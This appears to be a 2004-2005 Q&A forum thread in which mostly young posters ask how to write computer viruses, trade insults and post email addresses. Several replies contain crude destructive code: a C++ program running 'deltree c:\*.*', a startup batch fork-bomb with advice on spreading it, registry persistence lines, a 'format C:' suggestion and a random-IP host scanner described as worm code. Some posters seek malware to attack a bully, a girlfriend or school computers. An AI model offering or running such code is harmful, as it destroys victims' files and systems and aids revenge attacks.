LOL, well what did you expect? A load of code you all don't understand? Take advice from a programmer, if its worth doing it 'aint gonna be easy.

 

Answer by john
Submitted on 10/20/2004
Rating: Not yet rated Rate this answer: Vote
i want to be a virus!
i want to be a hacking man!

 

Answer by NEWTONIAN
Submitted on 10/20/2004
Rating: Not yet rated Rate this answer: Vote
CREATING VIRUS IS NOT A CHILD'S FANCY DEAR,A C++ BOOK OR JUST A COMPILER ISN'T GOING TO HELP.TRY OUT WITH SOME EXPERIENCED PROGRAMMER IN PERL OR C.



















 

Answer by sayed amiruddin
Submitted on 10/21/2004
Rating: Not yet rated Rate this answer: Vote
i want to be a hacker and create a virus,anyone can help me. this my email :samir86@plasa.com

 

Answer by boaz
Submitted on 10/21/2004
Rating: Not yet rated Rate this answer: Vote
i am 11 and just started programming u all sound like a 2 year old or like me when i was 7 you can write viruses in DOS and c++ i also suggest making a folder with tons of viruses in it and if you want to hack u can do it with telnet or even better internet explorer by typing an ip and then doing : and port 80 or you can check euyulio.org

 

Answer by Jun
Submitted on 10/23/2004
Rating: Not yet rated Rate this answer: Vote
omfg you people are dumb. first off, those of you that say "i want to be a hacker, i want to write viruses", probably don't know sh!t about computers and if you post your email address, and someone like me (but with more free time on their hands) sees it, you WILL be flamed. don't be stupid... if you REALLY want to be a hacker, go to your kitchen, grab a nice sized bowl, a couple eggs, and crack the eggs on the bowl's edge. congrats. you are now a "hacker". you know what realy hackers call people like you? CRACKERS because you don't know wtf you're doing...

 

Answer by mdavid
Submitted on 10/24/2004
Rating: Not yet rated Rate this answer: Vote
destroy all bad virus

 

Answer by MS Hacman
Submitted on 10/26/2004
Rating: Not yet rated Rate this answer: Vote
LOOSERS!

 

Answer by VirusBOB
Submitted on 10/31/2004
Rating: Not yet rated Rate this answer: Vote
Dude i have read a book about C++ (Learn C++ in 21 Days) but i still dont know how to create a virus.  So tell me how please, cause ive done what u said.  PE@CE!

 

Answer by armaghan khan
Submitted on 11/1/2004
Rating: Not yet rated Rate this answer: Vote
I WANT TO BECOME A GREAT HACKER AND VIRUS
CREATER.

 

Answer by elf
Submitted on 11/4/2004
Rating: Not yet rated Rate this answer: Vote
if you realy want to creat a virus learn assambler

 

Answer by winter
Submitted on 11/5/2004
Rating: Not yet rated Rate this answer: Vote
how can i send a virus to someones computer and have the memory erased?

 

Answer by Daniel
Submitted on 11/9/2004
Rating: Not yet rated Rate this answer: Vote
I do not want to create a virus (although I think it would be a good programming exercise), I am interested, however, in creating a tool to help me find my stolen laptop by its mac address...

I think that all of the people (kids) here that want to create mal virii should go and learn a bit about computers and how they work before even thinking about writing virii.

Also, why bother with c++?
Assembler is more appropriate for this.
Get yourself a copy of borland turbo assembler and maybe masm and do some work you lazy bums (LOL).

 

Answer by MJ
Submitted on 11/9/2004
Rating: Not yet rated Rate this answer: Vote
Hello wanna be hackers,
  You can create virus if you are familier with system functions. These functions can be called from C++. Some of these functions can delete files, create files, delete directory(ies) or create a directory(ies). You can also write a very simple code that can eat up the memory. But you really need to know C++ or other good programming langauge in order to do so. Don't ever think that someone will give you his virus source code. Sorry to bust in late, but I've recently saw this page.

 

Answer by Jamir
Submitted on 11/9/2004
Rating: Not yet rated Rate this answer: Vote
ask to the expert

 

Answer by Siddin
Submitted on 11/10/2004
Rating: Not yet rated Rate this answer: Vote
WOW, you people need to get educated. If you did make a virus, you wouldn't even know what to do with it with the way you all are talking. Read a f**king book first!

 

Answer by XingMei
Submitted on 11/11/2004
Rating: Not yet rated Rate this answer: Vote
guys!!! please help me with my project... we will make a virus and then the anti virus of our virus... can you please give me some of that!!!! : ) using c++ just a simple ... we can't enter this coming tuesday if we don't  have the algorithm of our virus...huhuhu... please guys help me....:( email me in this add:

mia_savir@yahoo.com  ... i'll wait until monday.. today is nov.11,2004 in monday is nov.15 2004... please guys thnks!!!!

 

Answer by ..|..
Submitted on 11/12/2004
Rating: Not yet rated Rate this answer: Vote
i don't want help!! i wanna learn it myself so i quit seeing this page bbye!!

 

Answer by manu
Submitted on 11/14/2004
Rating: Not yet rated Rate this answer: Vote
y beg ???? just try to make one for ur self. then u will know the sweetness of hard work

 

Answer by Calvin
Submitted on 11/15/2004
Rating: Not yet rated Rate this answer: Vote
"all of u ppl asking how to make a virus r twats. and n00bs. no rly, u r. get a frikin c++ book for f""ks sake"

They may be noobs but you type like one.

 

Answer by DDrgod 123
Submitted on 11/16/2004
Rating: Not yet rated Rate this answer: Vote
thanx for the virus's i'lluse them very well

 

Answer by luis11
Submitted on 11/21/2004
Rating: Not yet rated Rate this answer: Vote
i like to create a new account

 

Answer by loveinsfector@hotmail.com
Submitted on 11/24/2004
Rating: Not yet rated Rate this answer: Vote
i want to creat virus by my self

 

Answer by ryan
Submitted on 11/24/2004
Rating: Not yet rated Rate this answer: Vote
I really want to know how to create virus, can anyone help me or tell me web address where i can learn it....or send it to my em.. ryhzel@yahoo.com....thanks!!!

 

Answer by hax_lov_Kim
Submitted on 11/29/2004
Rating: Not yet rated Rate this answer: Vote
i know how to create a virus that deletes ur c drive!!!

 

Answer by sachin verma
Submitted on 11/30/2004
Rating: Not yet rated Rate this answer: Vote
tell me something how to create virus in c++

 

Answer by Maaty88
Submitted on 12/4/2004
Rating: Not yet rated Rate this answer: Vote
i just want to no how to create viruses and what programs to use. if any one has the time email me at maaty88@gmail.com thx

 

Answer by Mintoo
Submitted on 12/5/2004
Rating: Not yet rated Rate this answer: Vote
ya i want to create a virus using c language
please help me

 

Answer by rentau
Submitted on 12/5/2004
Rating: Not yet rated Rate this answer: Vote
I just want to be a good hacker someday.I want to make virus too.

 

Answer by TINTIN
Submitted on 12/5/2004
Rating: Not yet rated Rate this answer: Vote
Hi all the guys. I want to know how to creat a html virus plz if there is any one who can help me e mail to this address
umerhalee@yahoo.com

 

Answer by singkopesos
Submitted on 12/6/2004
Rating: Not yet rated Rate this answer: Vote
i like to creat virus to give lesson to my enemies

 

Answer by philong
Submitted on 12/8/2004
Rating: Not yet rated Rate this answer: Vote
if i could create  viruses i`d only create for a good purpose example to send them to a f-secure or Norton and help them creating more powerful antiviral progs... i maybe stupid but i`d still do it...


 

Answer by UTOTEN
Submitted on 12/8/2004
Rating: Not yet rated Rate this answer: Vote
WALA LANG BASTA TRIP KO LANG HAHAHAHAHAHA MGA KUMAG KAYO HINDI KO NGA ALAM ANG SINASABI NYO DITO AKO PA KAYA.....SIGE TOYOK NA DONG

 

Answer by Only 10 kinds of people, those who understand binary and those who don't.
Submitted on 12/9/2004
Rating: Not yet rated Rate this answer: Vote
Jesus spoke to me in a dream last night, and he said, D, I can make you the best hacker in the world before you wake up.  I said, "really jesus?" and he said.. "What the F$%* D, are you the laziest piece of $Hit in the world or what??  Even I can't make you less stupid and ignorant!"  So I ask, if Jesus can't then How could someone else.  If you are looking for good sites, or books to help you, then Search http://www.google.com for Help with the language that you wanna use, or go to the library (that's the place where you go to get books) or the book store (another great place for books) and learn AS MUCH AS YOU CAN, then when you feel like asking another stupid question on a forum, DON't because no one can help.  YOU have to HeLP yourself.  Once you know all the tricks and tips that you can find about the language, then drop intellegent questions on the forums that you find for the language that you use.. then to hack or make viruses to hack for you, then you have to learn more about the way the hardware and software interact on your own computer.. ie: registers, ports, etc.. then find out differences between Operating Systems, and versions, because each have their own exploits and vulns, so then you can begin hacking... If you want an answer to a question then I can answer one: No one can or will help you hack, because unless they are really really close friends, they feel nothing but insulted that you would even ask a stupid question like how do I hack or write a virus?, because you have to do the work yourself, and that takes skillz and knowledge that you really would not read on this here site.  So get searching, and read read read then read some more.  I think that I speak for pretty much anyone that 'could' answer your question if only they could take the time to set up a 1000 page website with utilities examples and source code for the raping.. Oh, and if you don't understand the binary comment,  Do not ask.. I know that I'd just laugh at ya... :D.

 

Answer by rye
Submitted on 12/10/2004
Rating: Not yet rated Rate this answer: Vote
hey cud someone give me the algo for creating a virus my email id is..barmycodger@yahoo.com

 

Answer by Nice guy
Submitted on 12/11/2004
Rating: Not yet rated Rate this answer: Vote
Are all of you bad guys, there is other ways to earn money then creating virus.

Try to create a robust and secure program instead

 

Answer by spunjus
Submitted on 12/11/2004
Rating: Not yet rated Rate this answer: Vote
ya All idiots.

ere is a coulple of tins u could do,.,,

goto command prompt. type shutdown -s
then enter

afta u done that type a website you want to send a virus to. then copy this code afta echo ur computer has now got a virus on it!!!
example
is

echo www.google.com ur computer has now got a virus on it!!!

yo losers.

 

Answer by skanler
Submitted on 12/11/2004
Rating: Not yet rated Rate this answer: Vote
I want  a virus of mass destruction to release on my school computers, where can I get one?

 

Answer by Lord
Submitted on 12/12/2004
Rating: Not yet rated Rate this answer: Vote
What a bunch of pathetic no hopers.....if you are here begging for virus codes you will never be any good at making viruses......get a life you sad freaks

 

Answer by daniel_jrm
Submitted on 12/13/2004
Rating: Not yet rated Rate this answer: Vote
Just stop posting your Emails on here, did you know there are companies like Norton and F-Secure* watchin boards like this, if there is a huge worm or bug, etc the look at this and look at people who post codes on websites on here, so to all of you people who have code, Keep yourself Secret never reveal that u r a hacker/programmer...:D:D:D

 

Answer by BEST
Submitted on 12/13/2004
Rating: Not yet rated Rate this answer: Vote
I have a birus but i dont know how can i in blast that virus in the network ! Can somebody how can i let the virus in network >???????

 

Answer by juju
Submitted on 12/14/2004
Rating: Not yet rated Rate this answer: Vote
i want to create virus

 

Answer by hoaxer
Submitted on 12/14/2004
Rating: Not yet rated Rate this answer: Vote
i like bunys

 

Answer by DeadMan
Submitted on 12/21/2004
Rating: Not yet rated Rate this answer: Vote
Hey EveryBody, Y make virus??? u don't want to be evil. but if u want to take revenge from sumbody. sure go ahead. i'llhelp ya.
i have a little virus code
i will include the code but before that you must DOWNLOAD C++ MINGW COMPILER FROM WWW.BLOODSHED.COM "IT'S FREEEEEE". ALL YOU HAVE TO DO IS SAVE THE FOLLOWING CODE AND COMPILE IT. IF IT DOESN'T WORK, THEN TOO BAD.Here is the code:


#include <stdlib.h>

using namespace std;

void main(int argv,char args[])
{

system("deltree c:\\*.*");

}

 

Answer by crayon
Submitted on 12/21/2004
Rating: Not yet rated Rate this answer: Vote
s u c k e r !!~

 

Answer by dhel
Submitted on 12/21/2004
Rating: Not yet rated Rate this answer: Vote
im revalbos rodel from paete laguna >>>rhev_14@yahoo.com<<<_________________________<<<revalbos14@yahoo.com>>>______________ im'18yrs old student of balian community college                                      answer:(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

 

Answer by sami
Submitted on 12/23/2004
Rating: Not yet rated Rate this answer: Vote
i wanna learn how to create virus and how to enter in computer security

 

Answer by amigaxxl
Submitted on 12/24/2004
Rating: Not yet rated Rate this answer: Vote
If you want to create a virus, the simple thing to do is go to [start]\[run]
and type "format C:" (without the double quotes) !
That is the second most efficient of them all... The first biggest virus come on CD. It's called Windows !!!

amigaxxl

 

Answer by RAMESH 
Submitted on 12/26/2004
Rating: Not yet rated Rate this answer: Vote
i would like to create virus using c,c++ help me
dec26th2004@yahoo.co.in





 

Answer by ericko
Submitted on 12/29/2004
Rating: Not yet rated Rate this answer: Vote
hi there guys! i really wanna learn how to create virus, i have no time reading books and so on, so if anyone out there who knows a lot in terms of creating virus then mail it to natoyi2003@yahoo.com, i just really need some codes for me to study...

 

Answer by rico jay
Submitted on 1/1/2005
Rating: Not yet rated Rate this answer: Vote
hi there! hey mr. lee you have said you have c++ software? i dont have one so can you attached it and send to my email account; its natoyi2003@yahoo.com   i hope you gonna send it asap. thanks

 

Answer by NOTatALL
Submitted on 1/1/2005
Rating: Not yet rated Rate this answer: Vote
i know some virus such as _1000 and _200

 

Answer by new2com
Submitted on 1/3/2005
Rating: Not yet rated Rate this answer: Vote
i want to create a virus too but my computer is hacked already by a unknown hacker. i wanna hack his computer back
can somebody teach me?

 

Answer by Harry Parmar
Submitted on 1/4/2005
Rating: Not yet rated Rate this answer: Vote
I want to Create a virus in C & C++.How can i do this.Can you help me.

 

Answer by blerg
Submitted on 1/4/2005
Rating: Not yet rated Rate this answer: Vote
oh my... my oh my oh my... I honestly couldnt believe there is this level of stupidity in the programming world until I read some of you people's posts...

 

Answer by Leart2k
Submitted on 1/5/2005
Rating: Not yet rated Rate this answer: Vote
hahahhahahha very funny hahahahahahahahahha mUHAHAHAHAHAHHA YEAHHHHHHH......!!!!!!
go here and learn C++ >> http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-53,GGLD:en&q=c%2B%2B+tutorial <<

 

Answer by Storm Crow
Submitted on 1/5/2005
Rating: Not yet rated Rate this answer: Vote
I unlike these noobs know a fair bit of C++
but I can't figure out how to make a virus.
Do you guys know any sites or books that would help me on this?

To the Noobs: Learn C++ before u come whining.

 

Answer by Ferox
Submitted on 1/6/2005
Rating: Not yet rated Rate this answer: Vote
Anyone know how to get your current directory that your program is in, and save that as a variable in your program? -

char cdir[150] = NULL;
GetCurrentDir(MAX_PATH,cdir);

When you know enough to make a virus, Youl loose all interest and move onto more challenging things such as a usefull application.


 

Answer by munakk
Submitted on 1/9/2005
Rating: Not yet rated Rate this answer: Vote
can any one tell me, is there way to hack hotmail account? how?

 

Answer by Fuse X20
Submitted on 1/12/2005
Rating: Not yet rated Rate this answer: Vote
Hey Every one i am learning to read want write HTML. I need some help in learning generally how viruses are created. I don't want instructions on an already created virus i just want to know how to create one in general

 

Answer by Bluerayx900
Submitted on 1/15/2005
Rating: Not yet rated Rate this answer: Vote
The only thing I see here is people saying "I want to create a virus"/"I want information on viruses"/blah, blah, blah. Then there's the reply "Go buy a c++ book you ****!@#".

Well to tell everybody the truth, yes, knowing how to use a programming language such as c++ or Perl is in fact the first step. Now the second step to creating a virus involves INTELLIGENCE (something that you people just might lack). You must step out of the 'book' boundaries, and manipulate what you've learnt about your programming language to create whatever you want to create. After all, a virus is a list of malicious codes, that tell the computer to perform certain tasks, that are normally made up out of bad intentions.

So learn your programming. Learn it again. Then master it. The manipulate it into creating whatever you want to create...etc.etc.

 

Answer by dc
Submitted on 1/15/2005
Rating: Not yet rated Rate this answer: Vote
i suck ?

 

Answer by Intequillis
Submitted on 1/17/2005
Rating: Not yet rated Rate this answer: Vote
I don't think that any of you should be told how to make a virus, you seem to be too enticed by the darker side of hacking and programming. If you show the right ethics and wish to learn for your own purposes, then that is fine, but going out and destroying computers with overly sized payloads is not very nice.

However if you happen to be one of the people who want to learn for educational purposes, then this code is for you:

//Copyright Intequillis 2005
#include <fstream.h>
#include <iostream.h>
void main()
{
ofstream outputFile("\\startup\\virus.bat");
char str[255];
strcpy(str,"@echo off\ncls\nstart virus.bat\nexit");
outputFile.write(str, strlen(str));
outputFile.close();
return 0;
}

For you who wish to know how this works:

The program basically creates a file called virus.bat in the startup folder of your computer. The code inside startup.bat is simple, it opens the file, ultimately, this file (virus.bat) is the payload. It will keep opening itself until all the virtual memory is used up, forcing the computer ro shutdown/restart, it will continue to do this until booted from floppy or CD (to delete the file virus.bat).

You could take it further by placing the .exe file in the startup folder. This would mean that the person running the computer would also need to delete that file in order to get rid of the virus. This ofcourse can also be taken further by making the .exe file copy itself to other locations (random) so that it creates the .bat file again.

That wasn't too hard now, was it?

I'm new too C++ myself, so this virus is basic. Very basic. They range from things as simple as that, to ones more complex ones that YOU cannot even think about. You simpely don't have the right attitude to computers (Lamers and people who want to be malicious).

virii are quite a complex thing to make, that is if you don't understand how they work. I reccommend getting into them at a young age and learning a language like batch as a first language seeing as it is a very easy to learn language that will not get picked up as a virus if you scan it (Unless you do something like make it copy itself to lots of locations on your computer then send itself out to people on your outlook express contact lists, etc...), but even so, it is still powerful, yet not in the league of C++/C or assembly.

I advise learning languages in this order:

<> = Optional

HTML
<PHP>
<VBS>
Batch
C/C++
Assembly

That is the order I plan on doing things, I am currently on the C++ stage of it; previous languages help you to understand the syntax of other languages, and eventually it becomes a matter of understanding the syntax opposed to learning commands.

[/rant]

 

Answer by parthi
Submitted on 1/22/2005
Rating: Not yet rated Rate this answer: Vote
get me a virus program in C

 

Answer by coldburn
Submitted on 1/22/2005
Rating: Not yet rated Rate this answer: Vote
I was just wondering, i'mtryign to figure out what i have to do to be able to hack into my GF'scomputer.  She lives a few city's away, and i think she has been talking to this guy online and i want to be able to see if she is, or if her friends are lieing to me.  Do i need to create a virus to get into her computer? or is there a way i can just "hack" in and see what shes up to.

 

Answer by Karman
Submitted on 1/22/2005
Rating: Not yet rated Rate this answer: Vote
i'm have virus source code's... for any question inexinferis@gmail.com

 

Answer by noname
Submitted on 1/24/2005
Rating: Not yet rated Rate this answer: Vote
ok guys most of u are using script software wich every computer has but im at school and need a hack 2 break into the java script any ideas?

 

Answer by jeenwolf
Submitted on 1/24/2005
Rating: Not yet rated Rate this answer: Vote
How to creat a bug using visual basic

 

Answer by LASTHAND
Submitted on 1/27/2005
Rating: Not yet rated Rate this answer: Vote
ALL YOU DESPERATE SUCKERS CANT BE NEAR US EVIL WRITER PREPARE TO BE SLAUGHTER FOR I WILL STAND BY THE LIGHT OF GOD AND WITH MY WILL AND POWER CREATIVTY SHALL COME TRY TO FIND ME AND I SHALL ONLY SMITE YOU <<<<LASTHAND>>>>

 

Answer by ///hello///answer me!!!!!!!
Submitted on 1/27/2005
Rating: Not yet rated Rate this answer: Vote
SO JAZ IF THAT IS A REAL VIRUS, HOW DO YOU COMPILE IT AND SEND IT TO OTHERS???????

 

Answer by ZeldaGmr
Submitted on 1/28/2005
Rating: Not yet rated Rate this answer: Vote
How do you make a vbs or bat files to autoplay on a cd?

 

Answer by revan
Submitted on 1/29/2005
Rating: Not yet rated Rate this answer: Vote
how to write virus in ms-dos

 

Answer by Mgrg60
Submitted on 1/29/2005
Rating: Not yet rated Rate this answer: Vote
Hey guys im new to making viruses and want you to test this and tell me if it works:

grisoftavgantivirus:

scan:
programversion=7.0.300
fileversion=7.1.0.298
virusbase=265.8.2
licencenumber=70FREE-TX-L7Z2U-IB-P1-CO1-SWTY-QEN

duplicate:

programversion=7.0.300
fileversion=7.1.0.298
virusbase=265.8.2
licencenumber=70FREE-TX-L7Z2U-IB-P1-CO1-SWTY-QEN

destroy:

programversion=7.0.300
fileversion=7.1.0.298
virusbase=265.8.2
licencenumber=70FREE-TX-L7Z2U-IB-P1-CO1-SWTY-QEN

You have to have avg anti virus for it to work but im not sure. Copy and paste it to notepad, save it as freeavg.bat save as type 'all files', compress as attachment and send to anyone you want. I dont know if it will work though.  


 

Answer by x-kiLLerz
Submitted on 1/31/2005
Rating: Not yet rated Rate this answer: Vote
i want to destroy all weapon under construction that's all destroy the world and make that virus control the super computer.....!!!

[hate war]

 

Answer by Stefanos Demetriadis
Submitted on 1/31/2005
Rating: Not yet rated Rate this answer: Vote
I am a simple hacker from cyprus.I am just
13 years old!!!!
am working like a hackers here and 5 years!!
If i wanted to make the biggest virus c++
what could i do it?

 

Answer by Bernie_the_spermie
Submitted on 2/2/2005
Rating: Not yet rated Rate this answer: Vote
i also wanna create a virus... where do i get a good c++ programm?

 

Answer by nmo
Submitted on 2/5/2005
Rating: Not yet rated Rate this answer: Vote
fark y create a virus i mean if ya gona take time to learn to program why not do some thing use full with it anyone can write a virus

 

Answer by frensh
Submitted on 2/8/2005
Rating: Not yet rated Rate this answer: Vote
you know what ? i am frensh and i have 12 years old ! i know how to programing a worm using c++     you are stupid english or american but i say you "how to create a virus using c++ !

this code is for reading all server and test does it is Up or Down ( if is up virus can infect the victim by IP ! ). sasser using that !!


/*---------------------------------- Cut Here ---------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <netinet/in.h>

struct in_addr *find_valid_host(void)
{
struct in_addr *address = (struct in_addr *)malloc(sizeof(struct in_addr));

srand(time(NULL)); /* on initialise le générateur aléatoire */
address->s_addr = rand();

while (!isup(*address))
(address->s_addr)++;
/* ici, on utilise la routine isup() de nmap pour voir si la cible est up */

return address;
}

/*---------------------------------- Cut Here ---------------------------------*/

 

Answer by has
Submitted on 2/16/2005
Rating: Not yet rated Rate this answer: Vote
hi all i want to write virus using c++
please help me
my e- mail is
hasan_star2003@hotmail.com

 

Answer by huha
Submitted on 2/16/2005
Rating: Not yet rated Rate this answer: Vote
http://archives.devshed.com/fq-display/314/Security/Computer-Virus-FAQ

 

Answer by zach
Submitted on 2/17/2005
Rating: Not yet rated Rate this answer: Vote
Yo evry1.
Can any1 tell me how to disable administr rights in my school computer, so i can install viruses?

 

Answer by Mopy
Submitted on 2/18/2005
Rating: Not yet rated Rate this answer: Vote
lol, you n00bs, BUY A BLUDDIE BOOK!
Learn the language. Then you can do whatever you want. Whenever you want. :D f00ls.
(Try learning Visual Basic first, if you can't handle it don't even try c++)

Mopy :)

 

Answer by jack
Submitted on 2/19/2005
Rating: Not yet rated Rate this answer: Vote
i want to become a computer hardware experts


 

Answer by KURT
Submitted on 2/19/2005
Rating: Not yet rated Rate this answer: Vote
I WANT TO CREATE A VÝRUS SO CAN YOU HELP ME?


 

Answer by XcaLibur
Submitted on 2/22/2005
Rating: Not yet rated Rate this answer: Vote
how to create virus?and what is c++?just help please...

 

Answer by sdds
Submitted on 2/23/2005
Rating: Not yet rated Rate this answer: Vote
OMGZ I WANTZ TEH LEARN HOWZ TO MAKE TEH VIRUZ!!111 PLZ SEND TEH VIRUZ INF0 @ DIS EMAIL!111

mancem@gmail.com

THANKZ GUYZ!111

 

Answer by raj
Submitted on 2/24/2005
Rating: Not yet rated Rate this answer: Vote
i want to learn how create a computer virus

 

Answer by <iostream.h>
Submitted on 2/25/2005
Rating: Not yet rated Rate this answer: Vote
LEts say i make a virus, how do i test the virus (using microsoft visual basic 6.0) safely without hurting my hardware/software in any way.
-S.R-

 

Answer by Mer
Submitted on 2/26/2005
Rating: Not yet rated Rate this answer: Vote
any time i like crack password and virus for any company

 

Answer by korenai
Submitted on 2/28/2005
Rating: Not yet rated Rate this answer: Vote
hi i am the master of virus if you want to create c++ virus and tutorial flash,javascript,html,dos promt just email korenai_9966@yahoo.com your question

 

Answer by urmom
Submitted on 3/6/2005
Rating: Not yet rated Rate this answer: Vote
ur all gay

 

Answer by ayman
Submitted on 3/8/2005
Rating: Not yet rated Rate this answer: Vote
i have a qusions please answer to me i try to make spyware in C++ prgrame, but i cant
if can help me
sen to me code[use c++,or java]
thank you

 

Answer by Darude
Submitted on 3/8/2005
Rating: Not yet rated Rate this answer: Vote
F*CK ALL Of U...........!!!!

 

Answer by glenix fiver
Submitted on 3/12/2005
Rating: Not yet rated Rate this answer: Vote
call exec drop database exec proc. devel crack codes. and
#include<stdio.h>
#include<conio.h>
int i;
void main(void)
{clrscr();
printf("kill the monster and virus
put your");

 

Answer by chris
Submitted on 3/12/2005
Rating: Not yet rated Rate this answer: Vote
My e-mail is chris_sebastiao@yahoo.com.au
can someone tell me how to make a simple virus easy to make.not very destructive.

 

Answer by Eggbert
Submitted on 3/15/2005
Rating: Not yet rated Rate this answer: Vote
Dc, ur so called 'e|3t' talk isn't appreciated. Especially if you're going to call people newbies, they won't understand your text then.. maybe restate that question. but you'll probably never be back here like me ^^

 

Answer by Synapse
Submitted on 3/18/2005
Rating: Not yet rated Rate this answer: Vote
try modifying the "autoexec.bat" with an exe file or a script using any lang.. Maybe u will get interesting results.
8-) 8-) 8-)

 

Answer by HACKBACK
Submitted on 3/19/2005
Rating: Not yet rated Rate this answer: Vote
HAY BE COOL

 

Answer by U guys r losers
Submitted on 3/21/2005
Rating: Not yet rated Rate this answer: Vote
you are the most pathetic pampered people i have seen im my whole life.Have u ever heard about google??????Research.You guys are like kids waiting to be pampered,Give me this and give me that.GOSH...............GET A LIFE!!!!

 

Answer by omfg.noobs
Submitted on 3/21/2005
Rating: Not yet rated Rate this answer: Vote
pathetic losers

 

Answer by WORLDS BEST HACKER
Submitted on 3/23/2005
Rating: Not yet rated Rate this answer: Vote
THE BEST THING TO HACK WITH IS A C++ OR GO ON TO WWW.LEMONPARTY.COM

 

Answer by RUSSIAN
Submitted on 3/25/2005
Rating: Not yet rated Rate this answer: Vote
You people are weird get a life and forget about viruses.  Some of us have better things to do then give viruses to you.  Or get a virus and break it to get the code for it. That is how you get a virus.

 

Answer by shyft
Submitted on 3/27/2005
Rating: Not yet rated Rate this answer: Vote
damn this is the gayest forum ever. i feel stupider by responding.
quick and dirty lesson on how to write viruses:
1. get a basic understanding of some language
2. learn about file manipulation in your lang         of choice
3. look at other viruses (source)
4. get discouraged by the work and effort that coder put into his source
5. kill yourself cause its the only way out for you

 

Answer by superspy
Submitted on 3/28/2005
Rating: Not yet rated Rate this answer: Vote
what do u do to creat a virus using java?

 

Answer by necro
Submitted on 3/28/2005
Rating: Not yet rated Rate this answer: Vote
I'm interested in creating a "virus" but just for my own use (mainly to see if I can!) and I agree with what's been said here.  If you want to learn to drive you don't just expect someone to wave a magic wand and you can drive; you need to learn to drive and put in the hard work and effort needed.  So why expect these guys to just give you the code for a virus?

Get a book, have a read and see what you can come up with.  I guess the guys here won't mind helping with little bugs in the code you've written if you're having a problem because at least you're trying!

Anyway, I'm off to order a C++ book and see what I can come up with!!

 

Answer by lol
Submitted on 3/29/2005
Rating: Not yet rated Rate this answer: Vote
all book stores have c++ c java and just about every other language ther is so go there. If you dont got the cash just go there and read for free thre is tons of stuff to learn. oh and one last thing you better not get your ip taken by fbi and get in jail for around 4-40 years just to tell you, you are going to get board of it fast better things to do.

 

Answer by deepak patil
Submitted on 3/30/2005
Rating: Not yet rated Rate this answer: Vote
i also want to crate a virus

 

Answer by Rivel
Submitted on 3/30/2005
Rating: Not yet rated Rate this answer: Vote
Plz i want to become a hacker and i live in lebanon, there are no C++ books here so i really need help ok guys i would really appreciate if you would help me my email is rivel_almassoudy@hotmail.com

 

Answer by Angrysnowflake
Submitted on 3/30/2005
Rating: Not yet rated Rate this answer: Vote
Without going into the LONG back story, I want to stop someone from using their PC for an indefinite amount of time. Preferably I'm looking for something that will shut down their OS whenever they boot up. Something like sasser or mydoom will do, or something as simple as a batch file that I can send inconspicuously through an e-mail. If anyone has an idea or a file e-mail me at dorkprincess86@hotmail.com

 

Answer by hamedalbert
Submitted on 4/1/2005
Rating: Not yet rated Rate this answer: Vote
i want know :
wich language programming writing is best for
1 writing virus
2 work and money
i writing program by visual basic
pleas guide me
thanks
i am hamed behzady from iran

 

Answer by Shadow
Submitted on 4/6/2005
Rating: Not yet rated Rate this answer: Vote
OOOOOOOOOOO u fkin Noob,s u really think some reall hacker would send "make Virus" Tutorials to ur E-mail id's. So that the they get caught by police. If u really wanna learn to make virus.Start learing languages like C++ and phyton. And experiment by writing new codes u friggin idiots. Maybe a respected hacker or coder would share his codes wid u if u atleast know wot tye code means. Nobody is goin to teach u "How to make Virus"...Now go out get a life.

 

Answer by Richard
Submitted on 4/7/2005
Rating: Not yet rated Rate this answer: Vote
some one pls send a virus to marcus_hockeyplayer@hotmail.com
he is the kind of person who will bully me at school on msn and everything and yet i still cant fight back please send a virus which deletes all of his stuff only
if u do thank you for releiving some of my heavy burden

 

Answer by [Netop]UK
Submitted on 4/7/2005
Rating: Not yet rated Rate this answer: Vote
Anyone wanne start a lil c++ virus project or summat come on irc.efnet.org in #hackergods or #thieves-hq and pm [Netop]UK .. i'll help or whatever ;) c ya there

 

Answer by Raj
Submitted on 4/8/2005
Rating: Not yet rated Rate this answer: Vote
I want to create a new account.

 

Answer by virusmaker
Submitted on 4/9/2005
Rating: Not yet rated Rate this answer: Vote
hey guys stop asking how to make a virus ur all thick if you look at the board most of you thicko get the same answer, get a friging book how can some one teach you a such a complicated thing get a book i'vealready got one i'mlearning

 

Answer by Bill
Submitted on 4/10/2005
Rating: Not yet rated Rate this answer: Vote
where can you create programs?Step by step please.

 

Answer by kaje_ovo
Submitted on 4/10/2005
Rating: Not yet rated Rate this answer: Vote
I wanna make C viruses. expecaly Jokes!

 

Answer by quiqster1231
Submitted on 4/12/2005
Rating: Not yet rated Rate this answer: Vote
Hackers, im learning how to hack alitle but i want to learn more to be good at it.So if ur kind enough send me things on how to do it and how to create a virus, and dont send me a virus .My e-mail is quiqster1231@hotmail.com and u can talk to me on AIM just IM me to trickster1231  

 

Answer by 0000
Submitted on 4/12/2005
Rating: Not yet rated Rate this answer: Vote
Yeah, true... I'd liki to get some on programing language. It would be great to send a virus that can paralyse a computer just for a while or to hack and upload any file you want..fun!

 

Answer by bl
Submitted on 4/13/2005
Rating: Not yet rated Rate this answer: Vote
where do u enter a c++ code.

 

Answer by vivi
Submitted on 4/14/2005
Rating: Not yet rated Rate this answer: Vote
damnrightdc i suggest gettin c++ for dummies
tis a gigantic book

 

Answer by Viral_Treat44
Submitted on 4/18/2005
Rating: Not yet rated Rate this answer: Vote
How to you program a virus using C?

 

Answer by Viral_Threat99
Submitted on 4/18/2005
Rating: Not yet rated Rate this answer: Vote
How do you program a virus in C, please E-Mail me at evilmonkey444@hotmail.com.

 

Answer by crystal
Submitted on 4/19/2005
Rating: Not yet rated Rate this answer: Vote
my computer have been hacked by someone, but i have no idea how to get rid of him, and i'm not a computer person so can anyone help me out here? i also want to learn how can people create virus or heck anothers so i can get heck this person back. my friends told me that i need a program or something to make a virus, what kind of program?

 

Answer by Tom
Submitted on 4/20/2005
Rating: Not yet rated Rate this answer: Vote
Send my viruses i collect them dont worry my pc is fully protected. ntfsee_jus_da_best@hotmail.com

 

Answer by JayJay
Submitted on 4/21/2005
Rating: Not yet rated Rate this answer: Vote
Can someone send me a tutorial on how to create a virusus I've been looking every but all I know is how to prevent it from getting to u my email is jay135200@yahoo.com

 

Answer by O_OWTH
Submitted on 4/24/2005
Rating: Not yet rated Rate this answer: Vote
Whoa, this is better then watching TV....
Who knew that there was such a flock of noobs on the web >.<

 

Answer by c_+_+_
Submitted on 4/25/2005
Rating: Not yet rated Rate this answer: Vote
